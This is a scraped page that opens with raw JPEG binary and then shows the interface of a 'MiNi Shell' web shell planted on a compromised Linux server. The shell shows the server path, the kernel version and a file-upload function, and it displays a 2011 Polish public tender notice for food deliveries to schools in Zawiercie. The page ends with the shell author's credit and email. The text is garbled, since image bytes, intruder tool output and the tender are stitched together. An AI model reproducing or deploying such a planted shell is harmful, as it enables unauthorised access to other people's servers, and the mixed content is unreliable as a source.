JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111208/416660-N-2011.html

<p class="kh_header"><b>Zawiercie: Zakup i dostawa artykułów żywnościowych tj.: mięsa, wędlin, nabiału, tłuszczów, ryb, jaj, warzyw, owoców, pieczywa, przypraw, słodyczy, produktów zbożowych dla Zespołu Szkół i Placówek Specjalnych im. M. Grzegorzewskiej  w Zawierciu, ul. Rataja 29a, oraz Internatu przy Zespole Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu z siedzibą w Jeziorowicach</b><br>
<b>Numer ogłoszenia: 416660 - 2011; data zamieszczenia: 08.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Placówek Oświatowo-Wychowawczych w Zawierciu , ul. Macieja Rataja 29a, 42-400 Zawiercie, woj. śląskie, tel. 032 6710254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ww.zoeas.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów żywnościowych tj.: mięsa, wędlin, nabiału, tłuszczów, ryb, jaj, warzyw, owoców, pieczywa, przypraw, słodyczy, produktów zbożowych dla Zespołu Szkół i Placówek Specjalnych im. M. Grzegorzewskiej  w Zawierciu, ul. Rataja 29a, oraz Internatu przy Zespole Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu z siedzibą w Jeziorowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> groch, fasola Jaś, szczypiorek, pietruszka, seler, pora, marchew, cebula, ogórki kiszone, ogórki zielone, kapusta czerwona, kapusta biała, kapusta kiszona, kapusta pekińska, pomidory, pietruszka natka, buraki, papryka świeża, czosnek, ziemniaki, pieczarki, sałata, cytryny, jabłka, rzodkiewki, pomarańcze, banany, kiwi, mandarynki, kalafior, rzodkiewki, koperek pęczek, botwinka, brokuły, jajka, wątroba drobiowa, mięso mielone indycze, mięso wieprzowe , udka z drobiu, skrzydełka z kurczaka, schab bez kości,  schab z kością, wołowina z kością, mortadela, kiełbasy cienkie, baleron, boczek surowy, szynka wiejska, parówki typu HAM, kiełbasa krakowska, kiełbasa szynkowa, pasztet z drobiu 160 g, mielonka typu Tyrolska, konserwy rybne 170g, pasztet pieczony, pasztetowa, baton drobiowy, polędwica drobiowa, szynka z indyka, boczek wędzony, kiełbasa typu śląska, kurczaki, flaki wołowe, wątroba drobiowa, rybne filety typu Mintaj, dżemy 280 g koncentrat pomidorowy typu Pudliszki 200g, ogórki konserwowe 1 litr, szczaw 330 g, mrożonki warzywne 400 g, chrzan, papryka konserwowa 0,9 l, syrop wiśnia 440g, przecier ogórkowy 330 g netto, kukurydza w puszce 300g, groszek w puszce 300g,  drożdże, kalafior mrożony, truskawki mrożone, olej    uniwersalny, słonina, smalec 200 g, margaryna mleczna 200g, margaryna 250g typu Kasia, mleko 2 % opak. 0,9 l, ser biały, serek kremowy typu Danio 140g, jogurt 150 ml, ser topiony 20g, ser żółty typu kanapkowy, masło 200 g, śmietana 30 %, jogurt naturalny 400g typu Włoszczowa, maślanka 1 litr, serek homogenizowany 150g, mleko karton 2%, serek topiony 100g, kasza jęczmienna, mąka, mąka ziemniaczana, ryż, kasza manna, majonez 0,7l  typu Winiary, chleb typu Baltoński 0,65 kg, bułki zwykłe 0,1 kg, bułki razowe, bułka tarta, kawa zbożowa typu INKA , żurek 0,5 l, makarony różne 0,4 kg, makaron typu Łazanka 0,4kg, cukier, syrop typu Herbapol 0,44 l, cukier waniliowy 32g ,herbata granulowana 100 g, ziele angielskie 15 g, liść laurowy 7 g, papryka mielona, sól, majeranek 16g, kakao 200g, bulion 1l typu WINIARY , Bulion drobiowy 12 kostek, musztarda, przyprawa typu Kucharek 1000 g, przyprawy do gulaszu 20g, pieprz mielony 20 g, ocet 0,5 l 10%, keczup 0,5l, cynamon 20g, czekolady 100 g, płatki kukurydziane 400g, drożdżówki, cukier puder, sos sałatkowy włoski 6g, koncentrat barszczu czerw. 220g, rolada makowa, przyprawa do bigosu, batoniki (min 40g), sok do herbaty typu Cytrynowy, przyprawa do kurczaka, przyprawy do flaków 20g, przyprawa do ziemniaków 20g, kwasek cytrynowy, kuleczki zbożowe 500g.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.10.00.00-2, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust 1 Prawo zamówień publicznych oraz braku podstaw do wykluczenia z postępowania-  Wykonawca składa oświadczenie, którego wzór stanowi Załącznik nr 3 do  SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełniony wykaz  dostaw  wg  Zał. Nr 4 oraz załączenie dokumentów  potwierdzających , że te dostawy zostały wykonane lub są wykonywane należycie (referencje itp.). Za spełnienie warunku uważać się będzie wykazanie minimum jednej dostawy w okresie 1 roku o charakterze porównywalnym do przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty  potwierdzające ,że  dostawy  zostały  wykonane  lub są  wykonywane należycie (np referencje)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoeas.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Placówek Oświatowo- Wychowawczych w Zawierciu, ul. Rataja 29a 42-400 Zawiercie, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2011 godzina 10:00, miejsce: Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Placówek Oświatowo- Wychowawczych w Zawierciu, ul. Rataja 29a 42-400 Zawiercie, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa artykułów żywnościowych tj.: mięsa, wędlin, nabiału, tłuszczów, ryb, jaj, warzyw, owoców, pieczywa, przypraw, słodyczy, produktów zbożowych dla Zespołu Szkół i Placówek Specjalnych im. M. Grzegorzewskiej  w Zawierciu, ul. Rataja 29a.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> groch, fasola Jaś, szczypiorek, pietruszka, seler, pora, marchew, cebula, ogórki zielone, kapusta czerwona, kapusta biała, kapusta kiszona, kapusta pekińska, pomidory, pietruszka natka, buraki, papryka świeża, czosnek, ziemniaki, pieczarki, sałata, cytryny, jabłka, rzodkiewki, pomarańcze, banany, kiwi, mandarynki, kalafior, koperek pęczek, botwinka, brokuły, ogórki kiszone, gruszki, jajka, mięso wieprzowe , filet z kurczaka, udka z drobiu, schab z kością, wołowina z kością, mortadela, kiełbasy cienkie, baleron, boczek surowy, szynka wiejska, kiełbasa krakowska, kiełbasa szynkowa, pasztet z drobiu 160 g, mielonka typu Tyrolska, pasztetowa, baton drobiowy, kiełbasa typu śląska, kurczaki, wątroba drobiowa, rybne filety typu Mintaj, dżemy 280 g koncentrat pomidorowy typu Pudliszki 200g, ogórki konserwowe 1 litr, szczaw 330 g, mrożonki warzywne 400 g, papryka konserwowa 0,9 l, przecier ogórkowy 330 g netto, kalafior mrożony, kalafior mrożony, kukurydza konserwowa, truskawki mrożone, olej    uniwersalny, słonina, smalec 200 g, margaryna 250g, mleko 2 % opak. 0,9 l, ser biały, jogurt 150 ml, ser żółty, masło 200 g, śmietana 30 %, maślanka 1 litr, kefir, serek topiony 100g, kasza jęczmienna, mąka, mąka ziemniaczana, ryż, kasza manna, chleb typu Baltoński 0,65 kg, bułki zwykłe 0,1 kg, bułki razowe, bułka tarta, kawa zbożowa typu INKA , żurek 0,5 l, makarony, cukier, syrop typu Herbapol 0,44 l, cukier waniliowy 32g ,herbata granulowana 100 g, ziele angielskie 15 g, liść laurowy 7 g, papryka mielona, sól, majeranek 16g, kakao 200g, bulion 1l typu WINIARY , przyprawa typu Kucharek 1000 g, pieprz mielony 20 g, ocet 0,5 l 10%, cynamon 20g, czekolady 100 g, cukierki czekoladowe, cukier puder, batoniki (min 40g),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.10.00.00-2, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa artykułów żywnościowych tj.: mięsa, wędlin, nabiału, tłuszczów, ryb, jaj, warzyw, owoców, pieczywa, przypraw, słodyczy, produktów zbożowych dla Internatu przy Zespole Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu z siedzibą w Jeziorowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> groch, fasola Jaś, pietruszka, seler, pora, marchew, cebula, ogórki kiszone, ogórki zielone, kapusta czerwona, kapusta biała, kapusta kiszona, kapusta pekińska, pomidory, buraki, czosnek, ziemniaki, pieczarki, sałata, jabłka, banany, mandarynki, kalafior, rzodkiewki, koperek pęczek, jajka, wątroba drobiowa, mięso wieprzowe , udka z drobiu, skrzydełka z kurczaka, kaszanka, schab bez kości, kiełbasy cienkie, baleron, szynka wiejska, parówki typu HAM, kiełbasa krakowska, kiełbasa szynkowa, pasztet z drobiu 160 g, konserwy rybne 170g, pasztet pieczony, baton drobiowy, polędwica drobiowa, szynka z indyka, boczek wędzony, kurczaki, flaki wołowe, rybne filety typu Mintaj, dżemy 280 g koncentrat pomidorowy typu Pudliszki 1000g, szczaw 270 g, mrożonki warzywne 400 g, chrzan, papryka konserwowa 0,9 l, syrop wiśnia 440g, kukurydza w puszce 340g, groszek w puszce 400g,  drożdże, olej    uniwersalny, smalec 200 g, margaryna mleczna 200g, mleko 2 % opak. 0,9 l, ser biały, jogurt 150 ml, ser topiony 20g, ser żółty typu kanapkowy, masło 200 g, śmietana 30 %, jogurt naturalny 400g typu Włoszczowa, serek homogenizowany 150g, mleko karton 2%, kasza jęczmienna, mąka, mąka ziemniaczana, ryż, majonez 0,7l  typu Winiary, chleb typu Baltoński 0,65 kg, bułki zwykłe 0,1 kg, bułka tarta, żurek 0,5 l, makarony różne 0,4 kg, makaron typu Łazanka 0,4kg, cukier, herbata granulowana 100 g, ziele angielskie 15 g, liść laurowy 7 g, sól, majeranek 16g, kakao 200g, bulion 1l typu WINIARY , Bulion drobiowy 12 kostek, musztarda, przyprawa typu Kucharek 1000 g, przyprawy do gulaszu 20g, pieprz mielony 20 g, ocet 0,5 l 10%, keczup 0,5l, czekolady 100 g, płatki kukurydziane 400g, drożdżówki, sos sałatkowy włoski 6g, koncentrat barszczu czerw. 220g, rolada makowa, przyprawa do bigosu, budyń, batoniki (min 40g), sok do herbaty typu Cytrynowy, przyprawa do kurczaka, przyprawy do flaków 20g, przyprawa do ziemniaków 20g, cynamon 20g, cukier puder, kwasek cytrynowy 50g, kuleczki zbożowe 500g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.10.00.00-2, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com